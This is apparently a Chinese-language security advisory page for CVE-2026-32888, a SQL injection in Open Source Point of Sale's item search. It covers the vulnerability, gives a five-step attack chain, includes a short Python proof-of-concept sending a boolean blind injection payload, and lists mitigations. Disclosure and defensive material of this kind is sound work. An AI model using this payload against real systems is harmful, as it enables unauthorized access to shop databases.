CVE-2026-32888 CVSS 8.8 高危

CVE-2026-32888 Open Source POS SQL注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32888

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open Source Point of Sale

漏洞概述

Open Source Point of Sale 是一款基于 PHP 的销售点系统。该系统在商品搜索功能中存在 SQL 注入漏洞。当启用自定义属性搜索时，攻击者可将恶意 SQL 语句注入到 search 参数中，由于后端直接将其拼接到 HAVING 子句且未做过滤，导致权限较低的认证用户即可执行任意 SQL 查询，获取敏感数据。

技术细节

漏洞的核心机制在于 Open Source Point of Sale 在处理数据库查询时使用了不安全的字符串拼接方式。具体而言，当 `search_custom` 过滤器处于开启状态，应用程序会提取 HTTP GET 请求中的 `search` 参数值，并将其直接嵌入到 SQL 语句的 `HAVING` 子句部分。由于缺乏参数化查询机制和必要的输入清洗，攻击者可以通过构造包含 SQL 元字符（如单引号、注释符）的 Payload，篡改查询逻辑。攻击者仅需拥有基本的商品搜索权限，即可利用此漏洞执行盲注、联合查询等攻击，进而窃取数据库中的所有敏感信息，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统正在使用 Open Source Point of Sale 应用程序。

STEP 2

步骤2：获取凭证

攻击者通过钓鱼、猜测或利用其他弱点获取一个低权限的合法用户账号凭证。

STEP 3

步骤3：构造请求

攻击者使用获取的凭证登录，并分析商品搜索功能的请求结构，发现 search_custom 参数。

STEP 4

步骤4：执行注入

攻击者在 GET 请求的 search 参数中注入恶意的 SQL 代码，发送至服务器端。

STEP 5

步骤5：获取数据

服务器将恶意代码拼接到 HAVING 子句并执行，攻击者根据回显或时间延迟提取数据库信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-ospos/index.php/items"

# Attacker requires a valid low-privilege session cookie
session_cookies = {
    "ci_session": "attacker_session_id_here"
}

# Malicious payload designed for HAVING clause injection
# This payload attempts to perform a boolean-based blind injection
sql_payload = "1' AND 1=1-- -"

parameters = {
    "search_custom": "1",  # This filter must be enabled to trigger the vulnerability
    "search": sql_payload
}

response = requests.get(target_url, params=parameters, cookies=session_cookies)

if response.status_code == 200:
    print("Payload sent successfully. Check response for timing or content differences.")
else:
    print("Request failed.")

影响范围

未指定具体版本（发布时受影响版本均存在该漏洞）

防御指南

临时缓解措施

在官方补丁发布之前，建议管理员暂时禁用系统的自定义属性搜索功能，并严格限制商品搜索接口的访问权限，同时加强对数据库异常查询行为的监控，以及时发现潜在的攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表